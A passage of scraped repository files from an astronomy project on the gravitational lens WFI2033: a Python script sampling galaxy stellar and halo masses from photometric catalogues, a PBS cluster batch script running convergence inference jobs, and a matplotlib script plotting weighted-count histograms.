np.array([-0.53,-2.50,+7.87])\n\ndef sample(median,stdlow,stdhigh): # samples from different standard deviation gaussians on each side of the mean\n rand = np.random.uniform(0,1,1)[0]\n if rand <= 0.5: # since MED divides the distribution in two equal parts\n return median - np.abs(np.random.normal(0, np.abs(stdlow), 1)[0])\n else:\n return median + np.abs(np.random.normal(0, stdhigh, 1)[0])\n\nsamples = 20\nmasterfile = \"/Users/cerusu/Dropbox/Davis_work/code/WFI2033/i_detect_i_and_ir_rnoconv_inoconv_ugrizYJHK_detectin_ir_short_potentiallyi23_withbpzeazylephareclassified_IRACmagslephareclassifiedF160W.cat\"\n#massfile = \"/Users/cerusu/Dropbox/Davis_work/code/WFI2033/i_detect_i_and_ir_rnoconv_inoconv_ugrizYJHK_detectin_ir_short_potentiallyi23_withbpzeazylephareclassified_IRACmagslephareclassifiedF160W_bpzsample_combined.cat.MAG_BC03_I09.lephareout\"\nmassfile = \"/Users/cerusu/Dropbox/Davis_work/code/WFI2033/i_detect_i_and_ir_rnoconv_inoconv_ugrizYJHK_detectin_ir_short_potentiallyi23_withbpzeazylephareclassified_IRACmagslephareclassifiedF160W_eazysample_combined.cat.MAG_BC03_I09.lephareout\"\n#massfile = \"/Users/cerusu/Dropbox/Davis_work/code/WFI2033/i_detect_i_and_ir_rnoconv_inoconv_ugrizYJHK_detectin_ir_short_potentiallyi23_withbpzeazylephareclassified_IRACmagslephareclassifiedF160W_noIRACbpzsample_combined.cat.MAG_BC03_I09.lephareout\"\n#massfile = \"/Users/cerusu/Dropbox/Davis_work/code/WFI2033/i_detect_i_and_ir_rnoconv_inoconv_ugrizYJHK_detectin_ir_short_potentiallyi23_withbpzeazylephareclassified_IRACmagslephareclassifiedF160W_noIRACeazysample_combined.cat.MAG_BC03_I09.lephareout\"\n#masterfile = \"/Users/cerusu/Dropbox/Davis_work/code/WFI2033/rnoconv_inoconv_ugrizYJHK_detectin_ir_short_potentiallyi23_withbpzeazylephareclassified_IRACmagslephareclassifiedF160W.cat\"\n#massfile = \"/Users/cerusu/Dropbox/Davis_work/code/WFI2033/rnoconv_inoconv_ugrizYJHK_detectin_ir_short_potentiallyi23_withbpzeazylephareclassified_IRACmagslephareclassifiedF160W_bpzsample_combined.cat.MAG_BC03_I09.lephareout\"\n#massfile = \"/Users/cerusu/Dropbox/Davis_work/code/WFI2033/rnoconv_inoconv_ugrizYJHK_detectin_ir_short_potentiallyi23_withbpzeazylephareclassified_IRACmagslephareclassifiedF160W_eazysample_combined.cat.MAG_BC03_I09.lephareout\"\n#massfile = \"/Users/cerusu/Dropbox/Davis_work/code/WFI2033/rnoconv_inoconv_ugrizYJHK_detectin_ir_short_potentiallyi23_withbpzeazylephareclassified_IRACmagslephareclassifiedF160W_noIRACbpzsample_combined.cat.MAG_BC03_I09.lephareout\"\n#massfile = \"/Users/cerusu/Dropbox/Davis_work/code/WFI2033/rnoconv_inoconv_ugrizYJHK_detectin_ir_short_potentiallyi23_withbpzeazylephareclassified_IRACmagslephareclassifiedF160W_noIRACeazysample_combined.cat.MAG_BC03_I09.lephareout\"\n\n\nx = 0\ny = 1\nra = 2\ndec = 3\ni_auto = 4\ni_auto_err = 5\nid = 8\nz_b = 28\nz_m2 = 48\nspec = 40\n#mBEST_ind_bpz = 60 # no IRAC\n#mINF_ind_bpz = 61 # no IRAC\n#mMED_ind_bpz = 62 # no IRAC\n#mSUP_ind_bpz = 63 # no IRAC\n#mBEST_ind_eazy = 67 # no IRAC\n#mINF_ind_eazy = 68 # no IRAC\n#mMED_ind_eazy = 69 # no IRAC\n#mSUP_ind_eazy = 70 # no IRAC\n#class_bpz = 72 # no IRAC\n#class_eazy = 73 # no IRAC\nmBEST_ind_bpz = 85\nmINF_ind_bpz = 86\nmMED_ind_bpz = 87\nmSUP_ind_bpz = 88\nmBEST_ind_eazy = 92\nmINF_ind_eazy = 93\nmMED_ind_eazy = 94\nmSUP_ind_eazy = 95\nclass_bpz = 97\nclass_eazy = 98\nif \"bpzsample\" in massfile: classify = class_bpz\nelse: classify = class_eazy\n\nmaster = np.loadtxt(masterfile,usecols=[x,y,ra,dec,i_auto,i_auto_err,id,classify,spec,z_b,z_m2,mBEST_ind_bpz,mINF_ind_bpz,mMED_ind_bpz,mSUP_ind_bpz,mBEST_ind_eazy,mINF_ind_eazy,mMED_ind_eazy,mSUP_ind_eazy],unpack=False)\nmass = np.loadtxt(massfile,usecols=[0,1,4,5,6,7]) # index, redshift and masses\n\n# Re-label columns\nx = 0\ny = 1\nra = 2\ndec = 3\ni_auto = 4\ni_auto_err = 5\nid = 6\nclassify = 7\nspec = 8\nz_b = 9\nz_m2 = 10\nmBEST_ind_bpz = 11\nmINF_ind_bpz = 12\nmMED_ind_bpz = 13\nmSUP_ind_bpz = 14\nmBEST_ind_eazy = 15\nmINF_ind_eazy = 16\nmMED_ind_eazy = 17\nmSUP_ind_eazy = 18\n\nif \"bpzsample\" in massfile:\n z_ind = z_b\n mBEST_ind = mBEST_ind_bpz\n mINF_ind = mINF_ind_bpz\n mMED_ind = mMED_ind_bpz\n mSUP_ind = mSUP_ind_bpz\nelse:\n z_ind = z_m2\n mBEST_ind = mBEST_ind_eazy\n mINF_ind = mINF_ind_eazy\n mMED_ind = mMED_ind_eazy\n mSUP_ind = mSUP_ind_eazy\n\n# for missing mMED take its error bars to be typical for that mag range\nerrbar18 = np.median(master[:,mMED_ind][(master[:,i_auto]>15) & (master[:,i_auto]<18) & (master[:,mMED_ind]!=-99)] - master[:,mINF_ind][(master[:,i_auto]>15) & (master[:,i_auto]<18) & (master[:,mMED_ind]!=-99)])\nerrbar19 = np.median(master[:,mMED_ind][(master[:,i_auto]>18) & (master[:,i_auto]<19) & (master[:,mMED_ind]!=-99)] - master[:,mINF_ind][(master[:,i_auto]>18) & (master[:,i_auto]<19) & (master[:,mMED_ind]!=-99)])\nerrbar20 = np.median(master[:,mMED_ind][(master[:,i_auto]>19) & (master[:,i_auto]<20) & (master[:,mMED_ind]!=-99)] - master[:,mINF_ind][(master[:,i_auto]>19) & (master[:,i_auto]<20) & (master[:,mMED_ind]!=-99)])\nerrbar21 = np.median(master[:,mMED_ind][(master[:,i_auto]>20) & (master[:,i_auto]<21) & (master[:,mMED_ind]!=-99)] - master[:,mINF_ind][(master[:,i_auto]>20) & (master[:,i_auto]<21) & (master[:,mMED_ind]!=-99)])\nerrbar22 = np.median(master[:,mMED_ind][(master[:,i_auto]>21) & (master[:,i_auto]<22) & (master[:,mMED_ind]!=-99)] - master[:,mINF_ind][(master[:,i_auto]>21) & (master[:,i_auto]<22) & (master[:,mMED_ind]!=-99)])\nerrbar23 = np.median(master[:,mMED_ind][(master[:,i_auto]>21) & (master[:,mMED_ind]!=-99)] - master[:,mINF_ind][(master[:,i_auto]>21) & (master[:,mMED_ind]!=-99)])\n\nfor i in range(master.shape[0]):\n line = np.zeros(8 + (samples + 1) * 3) # x,y,ra,dec,i_auto,i_auto_err,id,classify + 10 * (z,Mstar,Mhalo)\n line[0:8] = master[i][0:8] # x,y,ra,dec,i_auto,i_auto_err,id,classify are the first 8 columns from master\n z = np.zeros(samples + 1)\n if master[i][spec] > 0: z[0] = master[i][spec] # if there is a galaxy spectrum\n else: z[0] = master[i][z_ind]\n\n mBEST = master[i][mBEST_ind]\n mINF = master[i][mINF_ind]\n mMED = master[i][mMED_ind]\n mSUP = master[i][mSUP_ind]\n if mBEST < 0:\n mBEST = 9\n if mMED < 0:\n mMED = mBEST\n if (master[i][i_auto] > 15) & (master[i][i_auto] <= 18): errbar = errbar18\n if (master[i][i_auto] > 18) & (master[i][i_auto] <= 19): errbar = errbar19\n if (master[i][i_auto] > 19) & (master[i][i_auto] <= 20): errbar = errbar20\n if (master[i][i_auto] > 20) & (master[i][i_auto] <= 21): errbar = errbar21\n if (master[i][i_auto] > 21) & (master[i][i_auto] <= 22): errbar = errbar22\n if master[i][i_auto] > 22: errbar = errbar23\n mINF = mBEST - errbar\n mSUP = mBEST + errbar\n m = np.zeros(samples + 1)\n mhalo = np.zeros(samples + 1)\n m[0] = mMED\n a = 1 / (1 + z[0])\n if z[0] <= 1:\n logM1a = M10_[0] + M1a_[0] * (a - 1)\n logMs0a = Ms00_[0] + Ms0a_[0] * (a - 1)\n notlogMs0a = 10 ** logMs0a\n b = b0_[0] + ba_[0] * (a-1)\n d = d0_[0] + da_[0] * (a-1)\n g = g0_[0] + ga_[0] * (a-1)\n mhalo[0] = logM1a + b * (m[0] - logMs0a) + ((10 ** m[0]/notlogMs0a)**d)/(1+(10 ** m[0]/notlogMs0a)**(-g)) - 1/2\n else:\n logM1a = M10[0] + M1a[0] * (a - 1)\n logMs0a = Ms00[0] + Ms0a[0] * (a - 1)\n notlogMs0a = 10 ** logMs0a\n b = b0[0] + ba[0] * (a-1)\n d = d0[0] + da[0] * (a-1)\n g = g0[0] + ga[0] * (a-1)\n mhalo[0] = logM1a + b * (m[0] - logMs0a) + ((10 ** m[0]/notlogMs0a)**d)/(1+(10 ** m[0]/notlogMs0a)**(-g)) - 1/2\n line[8:11] = np.array([z[0],m[0],mhalo[0]])\n\n ind = 0\n for j in range(mass.shape[0]):\n if mass[j][0] == master[i][id]:\n ind = ind + 1 # this goes from 0 to 8\n z[ind] = mass[j][1]\n\n rand = np.random.uniform(0,1,1)[0]\n mBEST = mass[j][2]\n mINF = mass[j][3]\n mMED = mass[j][4]\n mSUP = mass[j][5]\n if mBEST < 0:\n mBEST = 9\n if mMED < 0:\n mMED = mBEST\n mINF = mBEST - errbar\n mSUP = mBEST + errbar\n m[ind] = sample(mMED,mINF-mMED,mSUP - mMED)\n if z[ind] <= 1:\n logM1a = sample(M10_[0],M10_[1],M10_[2]) + sample(M1a_[0],M1a_[1],M1a_[2]) * (a - 1)\n logMs0a = sample(Ms00_[0],Ms00_[1],Ms00_[2]) + sample(Ms0a_[0],Ms0a_[1],Ms0a_[2]) * (a - 1)\n notlogMs0a = 10 ** logMs0a\n b = sample(b0_[0],b0_[1],b0_[2]) + sample(ba_[0],ba_[1],ba_[2]) * (a - 1)\n d = sample(d0_[0],d0_[1],d0_[2]) + sample(da_[0],da_[1],da_[2]) * (a - 1)\n g = sample(g0_[0],g0_[1],g0_[2]) + sample(ga_[0],ga_[1],ga_[2]) * (a - 1)\n else:\n logM1a = sample(M10[0],M10[1],M10[2]) + sample(M1a[0],M1a[1],M1a[2]) * (a - 1)\n logMs0a = sample(Ms00[0],Ms00[1],Ms00[2]) + sample(Ms0a[0],Ms0a[1],Ms0a[2]) * (a - 1)\n notlogMs0a = 10 ** logMs0a\n b = sample(b0[0],b0[1],b0_[2]) + sample(ba[0],ba[1],ba[2]) * (a - 1)\n d = sample(d0[0],d0[1],d0_[2]) + sample(da[0],da[1],da[2]) * (a - 1)\n g = sample(g0[0],g0[1],g0_[2]) + sample(ga[0],ga[1],ga[2]) * (a - 1)\n mhalo[ind] = logM1a + b * (m[ind] - logMs0a) + ((10 ** m[ind]/notlogMs0a)**d)/(1+(10 ** m[ind]/notlogMs0a)**(-g)) - 1/2\n\n for j in range(samples):\n line[8+(j+1)*3:8+(j+2)*3] = np.array([z[j+1],m[j+1],mhalo[j+1]])\n if i == 0:\n data = line\n data[0:8] = master[0][0:8]\n else:\n data = np.c_[data,line]\n\n#np.savetxt(masterfile[:-4] + \"_WFI2033noIRACbpz_nobeta.cat\",data.T,fmt='%s %s %s %s %.2f %.2f %d %d %.2f %.4f %.4f %.2f %.4f %.4f %.2f %.4f %.4f %.2f %.4f %.4f %.2f %.4f %.4f %.2f %.4f %.4f %.2f %.4f %.4f %.2f %.4f %.4f %.2f %.4f %.4f %.2f %.4f %.4f %.2f %.4f %.4f %.2f %.4f %.4f %.2f %.4f %.4f %.2f %.4f %.4f %.2f %.4f %.4f %.2f %.4f %.4f %.2f %.4f %.4f %.2f %.4f %.4f %.2f %.4f %.4f %.2f %.4f %.4f %.2f %.4f %.4f')\n#np.savetxt(masterfile[:-4] + \"_WFI2033noIRACeazy_nobeta.cat\",data.T,fmt='%s %s %s %s %.2f %.2f %d %d %.2f %.4f %.4f %.2f %.4f %.4f %.2f %.4f %.4f %.2f %.4f %.4f %.2f %.4f %.4f %.2f %.4f %.4f %.2f %.4f %.4f %.2f %.4f %.4f %.2f %.4f %.4f %.2f %.4f %.4f %.2f %.4f %.4f %.2f %.4f %.4f %.2f %.4f %.4f %.2f %.4f %.4f %.2f %.4f %.4f %.2f %.4f %.4f %.2f %.4f %.4f %.2f %.4f %.4f %.2f %.4f %.4f %.2f %.4f %.4f %.2f %.4f %.4f')\n#np.savetxt(masterfile[:-4] + \"_WFI2033IRACbpz_nobeta.cat\",data.T,fmt='%s %s %s %s %.2f %.2f %d %d %.2f %.4f %.4f %.2f %.4f %.4f %.2f %.4f %.4f %.2f %.4f %.4f %.2f %.4f %.4f %.2f %.4f %.4f %.2f %.4f %.4f %.2f %.4f %.4f %.2f %.4f %.4f %.2f %.4f %.4f %.2f %.4f %.4f %.2f %.4f %.4f %.2f %.4f %.4f %.2f %.4f %.4f %.2f %.4f %.4f %.2f %.4f %.4f %.2f %.4f %.4f %.2f %.4f %.4f %.2f %.4f %.4f %.2f %.4f %.4f %.2f %.4f %.4f')\nnp.savetxt(masterfile[:-4] + \"_WFI2033IRACeazy_nobeta.cat\",data.T,fmt='%s %s %s %s %.2f %.2f %d %d %.2f %.4f %.4f %.2f %.4f %.4f %.2f %.4f %.4f %.2f %.4f %.4f %.2f %.4f %.4f %.2f %.4f %.4f %.2f %.4f %.4f %.2f %.4f %.4f %.2f %.4f %.4f %.2f %.4f %.4f %.2f %.4f %.4f %.2f %.4f %.4f %.2f %.4f %.4f %.2f %.4f %.4f %.2f %.4f %.4f %.2f %.4f %.4f %.2f %.4f %.4f %.2f %.4f %.4f %.2f %.4f %.4f %.2f %.4f %.4f %.2f %.4f %.4f')\n" }, { "alpha_fraction": 0.6681715846061707, "alphanum_fraction": 0.7629796862602234, "avg_line_length": 23.61111068725586, "blob_id": "c54a382b91320ce302f305263f3219d83b63c0fd", "content_id": "515f107251a029b2ef011f4f362f4f45bd6b934d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 443, "license_type": "no_license", "max_line_length": 100, "num_lines": 18, "path": "/python/scripts/NAOJ/batch_infer16.sh", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "#!/bin/sh\n#PBS -r y\n#PBS -m abe\n#PBS -q q1m\n#PBS -o Log16.out\n#PBS -e Log16.err\n#PBS -N 16\n#PBS -l mem=16gb\n#PBS -M [email protected]\n\n# Go to this job's working directory\ncd $PBS_O_HOME\n\n# Run your executable\ncd /mfst01a/rusucs/WFI2033/MSwghtratios/\n\npython inferkappa_unbiasedwithshearincrement2226.py WFI2033 5 45 23 meds gal gamma oneoverr flexion\npython inferkappa_unbiasedwithshearincrement2224.py WFI2033 5 120 23 meds gal gamma oneoverr flexion\n" }, { "alpha_fraction": 0.5681338310241699, "alphanum_fraction": 0.6441061496734619, "avg_line_length": 55.45957565307617, "blob_id": "f5169838a161e1ce3d542790d2c182d19e2b5fc2", "content_id": "4044998e2f7da41349d6a1cdbac73e6b7da223ff", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 13268, "license_type": "no_license", "max_line_length": 312, "num_lines": 235, "path": "/python/catalogue_utilities/weightinguniversal_histograms_samples_publicationqualitynotext.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# The code uses the weighted count ratios derived by weightinguniversal_overlap_sampling_nobeta_WFI2033rethought.py to produce paper-quality histograms without overlapped text\n# run as # run as python /Users/cerusu/GITHUB/zMstarPDF/python/catalogue_utilities/weightinguniversal_histograms_publicationqualitynotext.py WFI2033 45 5 23 meds bpz deti IRAC 0.61 0.71 100 handpicked\n# currently the code considers a fraction of 50% for the fields without mask\n\nimport numpy as np\nimport sys\nimport os\nimport time\nimport matplotlib.pyplot as plt\n\nplt.clf()\n\nlens = str(sys.argv[1])\nradius = str(sys.argv[2])\ninner = str(sys.argv[3])\nmag = str(sys.argv[4])\nmode = str(sys.argv[5])\nphotz = str(sys.argv[6])\ndetect = str(sys.argv[7])\nirac = str(sys.argv[8])\nzinf = str(sys.argv[9])\nzsup = str(sys.argv[10])\nbin = int(str(sys.argv[11]))\ntry: handpicked = '_'+str(sys.argv[12])\nexcept: handpicked = ''\n\nfontabsciss = 14\nfontlabel = 4\npltrange = 2.5\nif radius == \"45\":\n vertlimit = 2.5\nelse:\n vertlimit = 2.5\nif mode == \"sum\":\n vertlimit = 2.5\nlimit = 10**30\nroot = \"/Volumes/LaCieSubaru/weightedcounts/%s/\" % lens\n\nstart_time = time.time()\n\nprint \"Reading...\"\n''' if I want to plot the benchmark'''\n#lstW1_50 = [x for x in os.listdir(root) if ('W1' in x) and ('_24galphotmstar_50_%s_%s_%s_%s_%s_%sarcsec_0.lst' %(radius,lens,detect,irac,mode,inner) in x)] # select from the files in the root directory\n#lstW2_50 = [x for x in os.listdir(root) if ('W2' in x) and ('_24galphotmstar_50_%s_%s_%s_%s_%s_%sarcsec_0.lst' %(radius,lens,detect,irac,mode,inner) in x)]\n#lstW3_50 = [x for x in os.listdir(root) if ('W3' in x) and ('_24galphotmstar_50_%s_%s_%s_%s_%s_%sarcsec_0.lst' %(radius,lens,detect,irac,mode,inner) in x)]\n#lstW4_50 = [x for x in os.listdir(root) if ('W4' in x) and ('_24galphotmstar_50_%s_%s_%s_%s_%s_%sarcsec_0.lst' %(radius,lens,detect,irac,mode,inner) in x)]\n''' if I want to plot everything together'''\nlstW1_50 = [x for x in os.listdir(root) if ('W1' in x) and ('_24galphotmstar_50_msk%sarcsecrad%sarcsecgap_%s_%s_%s_%s_zgap%s_%s%s' %(radius,inner,lens,detect,irac,mode,zinf,zsup,handpicked) in x)] # select from the files in the root directory\nlstW2_50 = [x for x in os.listdir(root) if ('W2' in x) and ('_24galphotmstar_50_msk%sarcsecrad%sarcsecgap_%s_%s_%s_%s_zgap%s_%s%s' %(radius,inner,lens,detect,irac,mode,zinf,zsup,handpicked) in x)]\nlstW3_50 = [x for x in os.listdir(root) if ('W3' in x) and ('_24galphotmstar_50_msk%sarcsecrad%sarcsecgap_%s_%s_%s_%s_zgap%s_%s%s' %(radius,inner,lens,detect,irac,mode,zinf,zsup,handpicked) in x)]\nlstW4_50 = [x for x in os.listdir(root) if ('W4' in x) and ('_24galphotmstar_50_msk%sarcsecrad%sarcsecgap_%s_%s_%s_%s_zgap%s_%s%s' %(radius,inner,lens,detect,irac,mode,zinf,zsup,handpicked) in x)]\n\nif mag == \"24\" and photz == \"bpz\": cols=[4,6,8,10,12,14,16,18,20,22,24,26,28,30,32,34,36,38]\nif mag == \"24\" and photz == \"eazy\": cols=[40,42,44,46,48,50,52,54,56,58,60,62,64,66,68,70,72,74]\nif mag == \"23\" and photz == \"bpz\": cols=[5,7,9,11,13,15,17,19,21,23,25,27,29,31,33,35,37,39]\nif mag == \"23\" and photz == \"eazy\": cols=[41,43,45,47,49,51,53,55,57,59,61,63,65,67,69,71,73,75]\n\nfor i in range(len(lstW1_50)):\n if i == 0:\n q_W1_50read = np.loadtxt(root+lstW1_50[i], usecols=cols, unpack=True)\n else:\n q_W1_50read = np.r_['1',q_W1_50read,np.loadtxt(root+ lstW1_50[i], usecols=cols, unpack=True)]\n\nfor i in range(len(lstW2_50)):\n if i == 0:\n q_W2_50read = np.loadtxt(root+lstW2_50[i], usecols=cols, unpack=True)\n else:\n q_W2_50read = np.r_['1',q_W2_50read,np.loadtxt(root+ lstW2_50[i], usecols=cols, unpack=True)]\n\nfor i in range(len(lstW3_50)):\n if i == 0:\n q_W3_50read = np.loadtxt(root+lstW3_50[i], usecols=cols, unpack=True)\n else:\n q_W3_50read = np.r_['1',q_W3_50read,np.loadtxt(root+ lstW3_50[i], usecols=cols, unpack=True)]\n\nfor i in range(len(lstW4_50)):\n if i == 0:\n q_W4_50read = np.loadtxt(root+lstW4_50[i], usecols=cols, unpack=True)\n else:\n q_W4_50read = np.r_['1',q_W4_50read,np.loadtxt(root+ lstW4_50[i], usecols=cols, unpack=True)]\n\nprint \"Plotting...\"\n\nfig = plt.figure(figsize=(10,6))\nax1 = fig.add_subplot(6,3,1)\nax1.set_aspect(1, adjustable='datalim')\n\nfor i in range(18):\n \n q_W1_50 = q_W1_50read[i][q_W1_50read[i] < limit]\n if mode == \"sum\": q_W1_50 = abs(q_W1_50) # fix the negative halo convergence\n q_W2_50 = q_W2_50read[i][q_W2_50read[i] < limit]\n if mode == \"sum\": q_W2_50 = abs(q_W2_50)\n q_W3_50 = q_W3_50read[i][q_W3_50read[i] < limit]\n if mode == \"sum\": q_W3_50 = abs(q_W3_50)\n q_W4_50 = q_W4_50read[i][q_W4_50read[i] < limit]\n if mode == \"sum\": q_W4_50 = abs(q_W4_50)\n \n if i == 0: ax=plt.subplot(6,3,1, sharex=ax1, sharey=ax1)\n if i == 1: ax=plt.subplot(6,3,2, sharex=ax1, sharey=ax1)\n if i == 2: ax=plt.subplot(6,3,3, sharex=ax1, sharey=ax1)\n if i == 3: ax=plt.subplot(6,3,4, sharex=ax1, sharey=ax1)\n if i == 4: ax=plt.subplot(6,3,5, sharex=ax1, sharey=ax1)\n if i == 5: ax=plt.subplot(6,3,6, sharex=ax1, sharey=ax1)\n if i == 6: ax=plt.subplot(6,3,7, sharex=ax1, sharey=ax1)\n if i == 7: ax=plt.subplot(6,3,8, sharex=ax1, sharey=ax1)\n if i == 8: ax=plt.subplot(6,3,9, sharex=ax1, sharey=ax1)\n if i == 9: ax=plt.subplot(6,3,10, sharex=ax1, sharey=ax1)\n if i == 10: ax=plt.subplot(6,3,11, sharex=ax1, sharey=ax1)\n if i == 11: ax=plt.subplot(6,3,12, sharex=ax1, sharey=ax1)\n if i == 12: ax=plt.subplot(6,3,13, sharex=ax1, sharey=ax1)\n if i == 13: ax=plt.subplot(6,3,14, sharex=ax1, sharey=ax1)\n if i == 14: ax=plt.subplot(6,3,15, sharex=ax1, sharey=ax1)\n if i == 15: ax=plt.subplot(6,3,16, sharex=ax1, sharey=ax1)\n if i == 16: ax=plt.subplot(6,3,17, sharex=ax1, sharey=ax1)\n if i == 17: ax=plt.subplot(6,3,18, sharex=ax1, sharey=ax1)\n \n plt.hist(q_W1_50, histtype='step', color='b', label='W1_50', linewidth=0.5, normed=1, bins=bin, range=[0, pltrange])\n plt.hist(q_W2_50, histtype='step', color='g', label='W2_50', linewidth=0.5, normed=1, bins=bin, range=[0, pltrange])\n plt.hist(q_W3_50, histtype='step', color='r', label='W3_50', linewidth=0.5, normed=1, bins=bin, range=[0, pltrange])\n plt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=bin, range=[0, pltrange])\n\n z=np.linspace(0,vertlimit,1000)\n w=np.ones(1000)\n plt.plot(w,z,'k:')\n w=np.ones(1000) * np.median(q_W1_50)\n plt.plot(w,z,'b--')\n w=np.ones(1000) * np.median(q_W2_50)\n plt.plot(w,z,'g--')\n w=np.ones(1000) * np.median(q_W3_50)\n plt.plot(w,z,'r--')\n w=np.ones(1000) * np.median(q_W4_50)\n plt.plot(w,z,'k--')\n plt.xlim(0, 2.5)\n plt.ylim(0, vertlimit)\n if vertlimit == 4:\n ax.set_yticklabels(np.arange(0.0, vertlimit, 0.5))\n else:\n ax.set_yticklabels(np.arange(0.0, vertlimit, 0.5))\n ax.set_xticklabels(np.arange(0.0, 2.5, 0.5))\n if i == 0: ax.text(0.7, 0.7, '$1$', fontsize=fontabsciss, color='black',transform=ax.transAxes)\n if i == 1: ax.text(0.7, 0.7, '$z$', fontsize=fontabsciss, color='black',transform=ax.transAxes)\n if i == 2: ax.text(0.7, 0.7, '$M_\\star$', fontsize=fontabsciss, color='black',transform=ax.transAxes)\n if i == 3: ax.text(0.7, 0.7, '$M^2_\\star$', fontsize=fontabsciss, color='black',transform=ax.transAxes)\n if i == 4: ax.text(0.7, 0.7, '$M^3_\\star$', fontsize=fontabsciss, color='black',transform=ax.transAxes)\n if i == 5: ax.text(0.7, 0.7, '$1/r$', fontsize=fontabsciss, color='black',transform=ax.transAxes)\n if i == 6: ax.text(0.7, 0.7, '$z/r$', fontsize=fontabsciss, color='black',transform=ax.transAxes)\n if i == 7: ax.text(0.7, 0.7, '$M_\\star/r$', fontsize=fontabsciss, color='black',transform=ax.transAxes)\n if i == 8: ax.text(0.7, 0.7, '$M^2_\\star/r$', fontsize=fontabsciss, color='black',transform=ax.transAxes)\n if i == 9: ax.text(0.7, 0.7, '$M^3_\\star/r$', fontsize=fontabsciss, color='black',transform=ax.transAxes)\n if i == 10: ax.text(0.7, 0.7, '$M^2_{\\star\\mathrm{,rms}}$', fontsize=fontabsciss, color='black',transform=ax.transAxes)\n if i == 11: ax.text(0.7, 0.7, '$M^3_{\\star\\mathrm{,rms}}$', fontsize=fontabsciss, color='black',transform=ax.transAxes)\n if i == 12: ax.text(0.7, 0.7, '$M^2_\\star/r_\\mathrm{,rms}$', fontsize=fontabsciss, color='black',transform=ax.transAxes)\n if i == 13: ax.text(0.7, 0.7, '$M^3_\\star/r_\\mathrm{,rms}$', fontsize=fontabsciss, color='black',transform=ax.transAxes)\n if i == 14: ax.text(0.7, 0.7, '$M_\\star/r^3$', fontsize=fontabsciss, color='black',transform=ax.transAxes)\n if i == 15: ax.text(0.7, 0.7, '$M_\\star/r^2$', fontsize=fontabsciss, color='black',transform=ax.transAxes)\n if i == 16: ax.text(0.7, 0.7, '$\\sqrt{M_\\star}/r$', fontsize=fontabsciss, color='black',transform=ax.transAxes)\n if i == 17: ax.text(0.7, 0.7, '$\\sqrt{M_h}/r$', fontsize=fontabsciss, color='black',transform=ax.transAxes)\n #ax.set_xticklabels(np.arange(0.0, 3.0, 0.5))\n #if i in [0,4,8,12,15]:\n #plt.ylabel(\"Normalized counts\", fontsize=5)\n\n plt.tick_params(axis='x', labelsize=10)\n plt.tick_params(axis='y', labelsize=10)\n plt.setp(plt.xticks()[1], rotation=90)\n subplot = i+1\n print \"finished subplot %d/18; fraction of points inside the < %s cut: W1_75 %.3f \\n W2_75 %.3f \\n W3_75 %.3f \\n W4_75 %.3f \" % (subplot, limit, float(q_W1_50.size)/q_W1_50read[0].size, float(q_W2_50.size)/q_W2_50read[0].size, float(q_W3_50.size)/q_W3_50read[0].size, float(q_W4_50.size)/q_W4_50read[0].size)\n\nax=plt.subplot(6,3,1, sharex=ax1, sharey=ax1)\nplt.tick_params(axis='x', labelbottom='off')\nax=plt.subplot(6,3,2, sharex=ax1, sharey=ax1)\nplt.tick_params(axis='y',which='both',left='off',right='off',labelleft='off')\nplt.tick_params(axis='x', labelbottom='off')\nax=plt.subplot(6,3,3, sharex=ax1, sharey=ax1)\nplt.tick_params(axis='y',which='both',left='off',right='off',labelleft='off')\nplt.tick_params(axis='x', labelbottom='off')\nax=plt.subplot(6,3,4, sharex=ax1, sharey=ax1)\nplt.tick_params(axis='x', labelbottom='off')\nax=plt.subplot(6,3,5, sharex=ax1, sharey=ax1)\nplt.tick_params(axis='y',which='both',left='off',right='off',labelleft='off')\nplt.tick_params(axis='x', labelbottom='off')\nax=plt.subplot(6,3,6, sharex=ax1, sharey=ax1)\nplt.tick_params(axis='y',which='both',left='off',right='off',labelleft='off')\nplt.tick_params(axis='x', labelbottom='off')\nax=plt.subplot(6,3,7, sharex=ax1, sharey=ax1)\nplt.tick_params(axis='x', labelbottom='off')\nax=plt.subplot(6,3,8, sharex=ax1, sharey=ax1)\nplt.tick_params(axis='y',which='both',left='off',right='off',labelleft='off')\nplt.tick_params(axis='x', labelbottom='off')\nax=plt.subplot(6,3,9, sharex=ax1, sharey=ax1)\nplt.tick_params(axis='y',which='both',left='off',right='off',labelleft='off')\nplt.tick_params(axis='x', labelbottom='off')\nax=plt.subplot(6,3,10, sharex=ax1, sharey=ax1)\nplt.tick_params(axis='x', labelbottom='off')\nax=plt.subplot(6,3,11, sharex=ax1, sharey=ax1)\nplt.tick_params(axis='y',which='both',left='off',right='off',labelleft='off')\nplt.tick_params(axis='x', labelbottom='off')\nax=plt.subplot(6,3,12, sharex=ax1, sharey=ax1)\nplt.tick_params(axis='y',which='both',left='off',right='off',labelleft='off')\nplt.tick_params(axis='x', labelbottom='off')\nax=plt.subplot(6,3,13, sharex=ax1, sharey=ax1)\nplt.tick_params(axis='x', labelbottom='off')\nax=plt.subplot(6,3,14, sharex=ax1, sharey=ax1)\nplt.tick_params(axis='y',which='both',left='off',right='off',labelleft='off')\nplt.tick_params(axis='x', labelbottom='off')\nax=plt.subplot(6,3,15, sharex=ax1, sharey=ax1)\nplt.tick_params(axis='y',which='both',left='off',right='off',labelleft='off')\nplt.tick_params(axis='x', labelbottom='off')\nax=plt.subplot(6,3,17, sharex=ax1, sharey=ax1)\nplt.tick_params(axis='y',which='both',left='off',right='off',labelleft='off')\nax=plt.subplot(6,3,18, sharex=ax1, sharey=ax1)\nplt.tick_params(axis='y',which='both',left='off',right='off',labelleft='off')\n\nplt.subplots_adjust(left=0.05, bottom=0.15, right=0.95, top=0.98, wspace=0, hspace=0)\n#plt.subplot(6,3,5)\n#plt.legend(bbox_to_anchor=(1, 1),loc='lower right', borderaxespad=0., fontsize=10)\n#plt.legend(bbox_to_anchor=(5, -5), loc='lower right', borderaxespad=0., fontsize=10)\n\n# for some reason I need to add the lines below, or the last plot is not displayed\n#plt.subplots_adjust(top=0.6)\n#plt.tight_layout()\n\n#fig.text(0.5, 0.05, '$\\zeta^\\mathrm{meds,WX}_{q}$', ha='center', va='center', size='20')\nif ((radius == \"45\") & (mag == \"23\") & (mode == \"meds\")):\n fig.text(0.5, 0.05, 